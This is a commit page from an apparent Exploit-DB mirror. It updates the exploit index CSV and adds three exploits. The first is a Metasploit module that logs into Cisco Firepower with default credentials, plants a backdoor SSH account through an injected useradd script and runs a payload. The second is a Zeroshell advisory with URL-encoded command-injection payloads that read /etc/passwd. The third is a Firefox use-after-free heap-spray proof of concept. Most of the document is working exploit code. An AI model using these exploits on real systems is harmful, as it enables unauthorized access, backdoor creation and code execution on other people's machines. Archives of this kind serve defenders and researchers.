bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-01-14

Browse source 
3 new exploits

Mozilla Firefox < 50.1.0 - Use After Free

Cisco Firepower Management Console 6.0 - Post Authentication UserAdd

QuoteBook - 'poll.inc' Remote Config File Disclosure
QuoteBook - Remote Config File Disclosure
PHP-Fusion Mod vArcade 1.8 - (comment_id) SQL Injection
Pizzis CMS 1.5.1 - (visualizza.php idvar) Blind SQL Injection
PHP-Fusion Mod vArcade 1.8 - 'comment_id' Parameter SQL Injection
Pizzis CMS 1.5.1 - Blind SQL Injection

Joomla! Component com_xevidmegahd - 'catid' SQL Injection
Joomla! Component com_xevidmegahd - SQL Injection

DZcms 3.1 - (products.php pcat) SQL Injection
DZcms 3.1 - SQL Injection
phpMDJ 1.0.3 - (id_animateur) Blind SQL Injection
XOOPS Module tadbook2 - 'open_book.php book_sn' SQL Injection
phpMDJ 1.0.3 - 'id_animateur' Parameter Blind SQL Injection
XOOPS Module tadbook2 - SQL Injection
PHP-Fusion Mod the_kroax - 'comment_id' Parameter SQL Injection
Social Engine - 'browse_classifieds.php s' SQL Injection
PHP-Fusion Mod the_kroax - SQL Injection
Social Engine - SQL Injection

Zeroshell 3.6.0/3.7.0 Net Services - Remote Code Execution
This commit is contained in:
Offensive Security 2017-01-14 05:01:17 +00:00
parent a0c8330781
commit 08be47d8e2
4 changed files with 484 additions and 9 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

21
files.csv
View file

@ -5340,6 +5340,7 @@ id,file,description,date,author,platform,type,port
41018,platforms/windows/dos/41018.txt,"Boxoft Wav 1.0 - Buffer Overflow",2017-01-11,Vulnerability-Lab,windows,dos,0
41025,platforms/windows/dos/41025.txt,"VideoLAN VLC Media Player 2.2.1 - 'DecodeAdpcmImaQT' Buffer Overflow",2016-05-27,"Patrick Coleman",windows,dos,0
41030,platforms/windows/dos/41030.py,"SapLPD 7.40 - Denial of Service",2016-12-28,"Peter Baris",windows,dos,0
41042,platforms/windows/dos/41042.html,"Mozilla Firefox < 50.1.0 - Use After Free",2017-01-13,"Marcin Ressel",windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -15217,6 +15218,7 @@ id,file,description,date,author,platform,type,port
40990,platforms/windows/remote/40990.txt,"Microsoft Edge (Windows 10) - 'chakra.dll' Info Leak / Type Confusion Remote Code Execution",2017-01-05,"Brian Pak",windows,remote,0
41003,platforms/windows/remote/41003.py,"DiskBoss Enterprise 7.5.12 - 'POST' Buffer Overflow (SEH)",2017-01-10,"Wyndell Bibera",windows,remote,0
41013,platforms/linux/remote/41013.txt,"Ansible 2.1.4 / 2.2.1 - Command Execution",2017-01-09,Computest,linux,remote,0
41041,platforms/linux/remote/41041.rb,"Cisco Firepower Management Console 6.0 - Post Authentication UserAdd",2017-01-13,Metasploit,linux,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -20445,24 +20447,24 @@ id,file,description,date,author,platform,type,port
7691,platforms/php/webapps/7691.php,"Joomla! Component xstandard editor 1.5.8 - Local Directory Traversal",2009-01-07,irk4z,php,webapps,0
7697,platforms/php/webapps/7697.txt,"PHP-Fusion Mod Members CV (job) 1.0 - SQL Injection",2009-01-07,"Khashayar Fereidani",php,webapps,0
7698,platforms/php/webapps/7698.txt,"PHP-Fusion Mod E-Cart 1.3 - 'items.php' SQL Injection",2009-01-07,"Khashayar Fereidani",php,webapps,0
7699,platforms/php/webapps/7699.txt,"QuoteBook - 'poll.inc' Remote Config File Disclosure",2009-01-07,Moudi,php,webapps,0
7699,platforms/php/webapps/7699.txt,"QuoteBook - Remote Config File Disclosure",2009-01-07,Moudi,php,webapps,0
7700,platforms/php/webapps/7700.php,"CuteNews 1.4.6 - (ip ban) Cross-Site Scripting / Command Execution (Administrator Required)",2009-01-08,StAkeR,php,webapps,0
7703,platforms/php/webapps/7703.txt,"PHP-Fusion Mod vArcade 1.8 - (comment_id) SQL Injection",2009-01-08,"Khashayar Fereidani",php,webapps,0
7704,platforms/php/webapps/7704.pl,"Pizzis CMS 1.5.1 - (visualizza.php idvar) Blind SQL Injection",2009-01-08,darkjoker,php,webapps,0
7703,platforms/php/webapps/7703.txt,"PHP-Fusion Mod vArcade 1.8 - 'comment_id' Parameter SQL Injection",2009-01-08,"Khashayar Fereidani",php,webapps,0
7704,platforms/php/webapps/7704.pl,"Pizzis CMS 1.5.1 - Blind SQL Injection",2009-01-08,darkjoker,php,webapps,0
7705,platforms/php/webapps/7705.pl,"XOOPS 2.3.2 - (mydirname) Remote PHP Code Execution",2009-01-08,StAkeR,php,webapps,0
7711,platforms/php/webapps/7711.txt,"Fast FAQs System - Authentication Bypass",2009-01-09,x0r,php,webapps,0
7716,platforms/php/webapps/7716.pl,"Joomla! Component com_xevidmegahd - 'catid' SQL Injection",2009-01-11,EcHoLL,php,webapps,0
7716,platforms/php/webapps/7716.pl,"Joomla! Component com_xevidmegahd - SQL Injection",2009-01-11,EcHoLL,php,webapps,0
7717,platforms/php/webapps/7717.pl,"Joomla! Component com_jashowcase - 'catid' SQL Injection",2009-01-11,EcHoLL,php,webapps,0
7718,platforms/php/webapps/7718.txt,"Joomla! Component com_newsflash - 'id' SQL Injection",2009-01-11,EcHoLL,php,webapps,0
7719,platforms/php/webapps/7719.txt,"Fast Guest Book - Authentication Bypass",2009-01-11,Moudi,php,webapps,0
7722,platforms/php/webapps/7722.txt,"DZcms 3.1 - (products.php pcat) SQL Injection",2009-01-11,"Glafkos Charalambous",php,webapps,0
7722,platforms/php/webapps/7722.txt,"DZcms 3.1 - SQL Injection",2009-01-11,"Glafkos Charalambous",php,webapps,0
7723,platforms/php/webapps/7723.txt,"Seo4SMF for SMF forums - Multiple Vulnerabilities",2009-01-11,WHK,php,webapps,0
7724,platforms/php/webapps/7724.php,"phpMDJ 1.0.3 - (id_animateur) Blind SQL Injection",2009-01-11,darkjoker,php,webapps,0
7725,platforms/php/webapps/7725.txt,"XOOPS Module tadbook2 - 'open_book.php book_sn' SQL Injection",2009-01-11,stylextra,php,webapps,0
7724,platforms/php/webapps/7724.php,"phpMDJ 1.0.3 - 'id_animateur' Parameter Blind SQL Injection",2009-01-11,darkjoker,php,webapps,0
7725,platforms/php/webapps/7725.txt,"XOOPS Module tadbook2 - SQL Injection",2009-01-11,stylextra,php,webapps,0
7726,platforms/php/webapps/7726.txt,"BKWorks ProPHP 0.50b1 - Authentication Bypass",2009-01-11,SirGod,php,webapps,0
7728,platforms/php/webapps/7728.txt,"Weight Loss Recipe Book 3.1 - Authentication Bypass",2009-01-11,x0r,php,webapps,0
7729,platforms/php/webapps/7729.txt,"PHP-Fusion Mod the_kroax - 'comment_id' Parameter SQL Injection",2009-01-11,FasTWORM,php,webapps,0
7730,platforms/php/webapps/7730.txt,"Social Engine - 'browse_classifieds.php s' SQL Injection",2009-01-11,snakespc,php,webapps,0
7729,platforms/php/webapps/7729.txt,"PHP-Fusion Mod the_kroax - SQL Injection",2009-01-11,FasTWORM,php,webapps,0
7730,platforms/php/webapps/7730.txt,"Social Engine - SQL Injection",2009-01-11,snakespc,php,webapps,0
7731,platforms/php/webapps/7731.txt,"fttss 2.0 - Remote Command Execution",2009-01-11,dun,php,webapps,0
7732,platforms/php/webapps/7732.php,"Silentum Uploader 1.4.0 - Remote File Deletion",2009-01-11,"Danny Moules",php,webapps,0
7733,platforms/php/webapps/7733.txt,"Photobase 1.2 - 'Language' Local File Inclusion",2009-01-11,Osirys,php,webapps,0
@ -36978,3 +36980,4 @@ id,file,description,date,author,platform,type,port
41036,platforms/php/webapps/41036.txt,"Penny Auction Script - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps,0
41037,platforms/php/webapps/41037.txt,"ECommerce-TIBSECART - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps,0
41038,platforms/php/webapps/41038.txt,"ECommerce-Multi-Vendor Software - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps,0
41040,platforms/linux/webapps/41040.txt,"Zeroshell 3.6.0/3.7.0 Net Services - Remote Code Execution",2017-01-13,"Ozer Goker",linux,webapps,0

Can't render this file because it is too large.

294
platforms/linux/remote/41041.rb Executable file
View file

@ -0,0 +1,294 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::SSH
def initialize(info={})
super(update_info(info,
'Name' => "Cisco Firepower Management Console 6.0 Post Authentication UserAdd Vulnerability",
'Description' => %q{
This module exploits a vulnerability found in Cisco Firepower Management Console.
The management system contains a configuration flaw that allows the www user to
execute the useradd binary, which can be abused to create backdoor accounts.
Authentication is required to exploit this vulnerability.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Matt', # Original discovery & PoC
'sinn3r' # Metasploit module
],
'References' =>
[
[ 'CVE', '2016-6433' ],
[ 'URL', 'https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking' ]
],
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Targets' =>
[
[ 'Cisco Firepower Management Console 6.0.1 (build 1213)', {} ]
],
'Privileged' => false,
'DisclosureDate' => 'Oct 10 2016',
'CmdStagerFlavor'=> %w{ echo },
'DefaultOptions' =>
{
'SSL' => 'true',
'SSLVersion' => 'Auto',
'RPORT' => 443
},
'DefaultTarget' => 0))
register_options(
[
# admin:Admin123 is the default credential for 6.0.1
OptString.new('USERNAME', [true, 'Username for Cisco Firepower Management console', 'admin']),
OptString.new('PASSWORD', [true, 'Password for Cisco Firepower Management console', 'Admin123']),
OptString.new('NEWSSHUSER', [false, 'New backdoor username (Default: Random)']),
OptString.new('NEWSSHPASS', [false, 'New backdoor password (Default: Random)']),
OptString.new('TARGETURI', [true, 'The base path to Cisco Firepower Management console', '/']),
OptInt.new('SSHPORT', [true, 'Cisco Firepower Management console\'s SSH port', 22])
], self.class)
end
def check
# For this exploit to work, we need to check two services:
# * HTTP - To create the backdoor account for SSH
# * SSH - To execute our payload
vprint_status('Checking Cisco Firepower Management console...')
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/img/favicon.png?v=6.0.1-1213')
})
if res && res.code == 200
vprint_status("Console is found.")
vprint_status("Checking SSH service.")
begin
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
Net::SSH.start(rhost, 'admin',
port: datastore['SSHPORT'],
password: Rex::Text.rand_text_alpha(5),
auth_methods: ['password'],
non_interactive: true
)
end
rescue Timeout::Error
vprint_error('The SSH connection timed out.')
return Exploit::CheckCode::Unknown
rescue Net::SSH::AuthenticationFailed
# Hey, it talked. So that means SSH is running.
return Exploit::CheckCode::Appears
rescue Net::SSH::Exception => e
vprint_error(e.message)
end
end
Exploit::CheckCode::Safe
end
def get_sf_action_id(sid)
requirements = {}
print_status('Attempting to obtain sf_action_id from rulesimport.cgi')
uri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi')
res = send_request_cgi({
'method' => 'GET',
'uri' => uri,
'cookie' => "CGISESSID=#{sid}"
})
unless res
fail_with(Failure::Unknown, 'Failed to obtain rules import requirements.')
end
sf_action_id = res.body.scan(/sf_action_id = '(.+)';/).flatten[1]
unless sf_action_id
fail_with(Failure::Unknown, 'Unable to obtain sf_action_id from rulesimport.cgi')
end
sf_action_id
end
def create_ssh_backdoor(sid, user, pass)
uri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi')
sf_action_id = get_sf_action_id(sid)
sh_name = 'exploit.sh'
print_status("Attempting to create an SSH backdoor as #{user}:#{pass}")
mime_data = Rex::MIME::Message.new
mime_data.add_part('Import', nil, nil, 'form-data; name="action_submit"')
mime_data.add_part('file', nil, nil, 'form-data; name="source"')
mime_data.add_part('1', nil, nil, 'form-data; name="manual_update"')
mime_data.add_part(sf_action_id, nil, nil, 'form-data; name="sf_action_id"')
mime_data.add_part(
"sudo useradd -g ldapgroup -p `openssl passwd -1 #{pass}` #{user}; rm /var/sf/SRU/#{sh_name}",
'application/octet-stream',
nil,
"form-data; name=\"file\"; filename=\"#{sh_name}\""
)
send_request_cgi({
'method' => 'POST',
'uri' => uri,
'cookie' => "CGISESSID=#{sid}",
'ctype' => "multipart/form-data; boundary=#{mime_data.bound}",
'data' => mime_data.to_s,
'vars_get' => { 'no_mojo' => '1' },
})
end
def generate_new_username
datastore['NEWSSHUSER'] || Rex::Text.rand_text_alpha(5)
end
def generate_new_password
datastore['NEWSSHPASS'] || Rex::Text.rand_text_alpha(5)
end
def report_cred(opts)
service_data = {
address: rhost,
port: rport,
service_name: 'cisco',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge(service_data)
login_data = {
last_attempted_at: DateTime.now,
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::SUCCESSFUL,
proof: opts[:proof]
}.merge(service_data)
create_credential_login(login_data)
end
def do_login
console_user = datastore['USERNAME']
console_pass = datastore['PASSWORD']
uri = normalize_uri(target_uri.path, 'login.cgi')
print_status("Attempting to login in as #{console_user}:#{console_pass}")
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'vars_post' => {
'username' => console_user,
'password' => console_pass,
'target' => ''
}
})
unless res
fail_with(Failure::Unknown, 'Connection timed out while trying to log in.')
end
res_cookie = res.get_cookies
if res.code == 302 && res_cookie.include?('CGISESSID')
cgi_sid = res_cookie.scan(/CGISESSID=(\w+);/).flatten.first
print_status("CGI Session ID: #{cgi_sid}")
print_good("Authenticated as #{console_user}:#{console_pass}")
report_cred(username: console_user, password: console_pass)
return cgi_sid
end
nil
end
def execute_command(cmd, opts = {})
@first_exec = true
cmd.gsub!(/\/tmp/, '/usr/tmp')
# Weird hack for the cmd stager.
# Because it keeps using > to write the payload.
if @first_exec
@first_exec = false
else
cmd.gsub!(/>>/, ' > ')
end
begin
Timeout.timeout(3) do
@ssh_socket.exec!("#{cmd}\n")
vprint_status("Executing #{cmd}")
end
rescue Timeout::Error
fail_with(Failure::Unknown, 'SSH command timed out')
rescue Net::SSH::ChannelOpenFailed
print_status('Trying again due to Net::SSH::ChannelOpenFailed (sometimes this happens)')
retry
end
end
def init_ssh_session(user, pass)
print_status("Attempting to log into SSH as #{user}:#{pass}")
factory = ssh_socket_factory
opts = {
auth_methods: ['password', 'keyboard-interactive'],
port: datastore['SSHPORT'],
use_agent: false,
config: false,
password: pass,
proxy: factory,
non_interactive: true
}
opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
begin
ssh = nil
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
@ssh_socket = Net::SSH.start(rhost, user, opts)
end
rescue Net::SSH::Exception => e
fail_with(Failure::Unknown, e.message)
end
end
def exploit
# To exploit the useradd vuln, we need to login first.
sid = do_login
return unless sid
# After login, we can call the useradd utility to create a backdoor user
new_user = generate_new_username
new_pass = generate_new_password
create_ssh_backdoor(sid, new_user, new_pass)
# Log into the SSH backdoor account
init_ssh_session(new_user, new_pass)
begin
execute_cmdstager({:linemax => 500})
ensure
@ssh_socket.close
end
end
end

71
platforms/linux/webapps/41040.txt Executable file
View file

@ -0,0 +1,71 @@
####################################################################################################################################
# Exploit Title: Zeroshell - Net Services Unauthenticated Remote Code Execution | RCE
# Date: 13.01.2017
# Exploit Author: Ozer Goker
# Vendor Homepage: http://www.zeroshell.org
# Software Link: www.zeroshell.org/download/
# Version: 3.6.0 & 3.7.0
####################################################################################################################################
Introduction
Zeroshell is a small Linux distribution for servers and embedded devices with the aim to provide network services. It is available in the form of live CD or compact Flash image and it can be configured using a web browser. The main features of Zeroshell include: load balancing and failover of multiple Internet connections, UMTS/HSDPA connections by using 3G modems, RADIUS server for providing secure authentication and automatic management of encryption keys to wireless networks, captive portal to support web login, and many others.
Vulnerabilities: Unauthenticated Remote Code Execution | RCE
RCE details:
####################################################################################################################################
RCE 1
URL
http://192.168.0.75/cgi-bin/kerbynet?Action=StartSessionSubmit&User=%27%26cat%20/etc/passwd%26%27&PW=
METHOD
Get,Post
PARAMETER
User
PAYLOAD
%27%26cat%20/etc/passwd%26%27
####################################################################################################################################
RCE 2
URL
http://192.168.0.75/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%26cat%20/etc/passwd%26%27
METHOD
Get
PARAMETER
x509type
PAYLOAD
%27%26cat%20/etc/passwd%26%27
####################################################################################################################################
RCE 3
URL
http://192.168.0.75/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=%22%26cat%20/etc/passwd%26%22
METHOD
Get
PARAMETER
type
PAYLOAD
%22%26cat%20/etc/passwd%26%22
####################################################################################################################################

107
platforms/windows/dos/41042.html Executable file
View file

@ -0,0 +1,107 @@
<!DOCTYPE html>
<html>
<head>
<!-- <meta http-equiv="refresh" content="1"/> -->
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="Expires" content="0" />
<meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" />
<meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" />
<meta http-equiv="Pragma" content="no-cache" />
<style type="text/css">
body{
background-color:lime;
font-color:red;
};
</style>
<script type='text/javascript'></script>
<script type="text/javascript" language="JavaScript">
/*
* Mozilla Firefox < 50.1.0 Use-After-Free POC
* Author: Marcin Ressel
* Date: 13.01.2017
* Vendor Homepage: www.mozilla.org
* Software Link: https://ftp.mozilla.org/pub/firefox/releases/50.0.2/
* Version: < 50.1.0
* Tested on: Windows 7 (x64) Firefox 32 && 64 bit
* CVE: CVE-2016-9899
*************************************************
* (b1c.5e0): Access violation - code c0000005 (first chance)
* First chance exceptions are reported before any exception handling.
* This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Mozilla Firefox\xul.dll -
* eax=0f804c00 ebx=00000000 ecx=003be0c8 edx=4543484f esi=003be0e4 edi=06c71580
* eip=6d7cc44c esp=003be0b8 ebp=003be0cc iopl=0 nv up ei pl nz na pe nc
* cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
* xul!mozilla::net::LoadInfo::AddRef+0x3dd41:
* 6d7cc44c ff12 call dword ptr [edx] ds:002b:4543484f=????????
* 0:000> dd eax
* 0f804c00 4543484f 91919191 91919191 91919191
* 0f804c10 91919191 91919191 91919191 91919191
* 0f804c20 91919191 91919191 91919191 91919191
* 0f804c30 91919191 91919191 91919191 91919191
* 0f804c40 91919191 91919191 91919191 91919191
* 0f804c50 91919191 91919191 91919191 91919191
* 0f804c60 91919191 91919191 91919191 91919191
* 0f804c70 91919191 91919191 91919191 91919191
*
*/
var doc = null;
var cnt = 0;
function m(blocks,size) {
var arr = [];
for(var i=0;i<blocks;i++) {
arr[i] = new Array(size);
for(var j=0;j<size;j+=2) {
arr[i][j] = 0x41414141;
arr[i][j+1] = 0x42424242;
}
}
return arr;
}
function handler() { //free
if(cnt > 0) return;
doc.body.appendChild(document.createElement("audio")).remove();
m(1024,1024);
++cnt;
}
function trigger() {
if(cnt > 0) {
var pl = new Array();
doc.getElementsByTagName("*")[0].removeEventListener("DOMSubtreeModified",handler,false);
for(var i=0;i<4096;i++) { //replace
pl[i]=new Uint8Array(1000);
pl[i][0] = 0x4F;
pl[i][1] = 0x48;
pl[i][2] = 0x43;
pl[i][3] = 0x45; //eip
for(var j=4;j<(1000) - 4;j++) pl[i][j] = 0x91;
// pl[i] = document.createElement('media');
//document.body.appendChild(pl[i]);
}
window.pl = pl
document.getElementById("t1").remove(); //re-use
}
}
function testcase()
{
var df = m(4096,1000);
document.body.setAttribute('df',df);
doc = document.getElementById("t1").contentWindow.document;
doc.getElementsByTagName("*")[0].addEventListener("DOMSubtreeModified",handler,false);
doc.getElementsByTagName("*")[0].style = "ANNNY";
setInterval("trigger();",1000);
}
</script>
<title>Firefox < 50.1.0 Use After Free (CVE-2016-9899) </title>
</head>
<body onload='testcase();'>
<iframe src='about:blank' id='t1' width="100%"></iframe>
</body>
</html>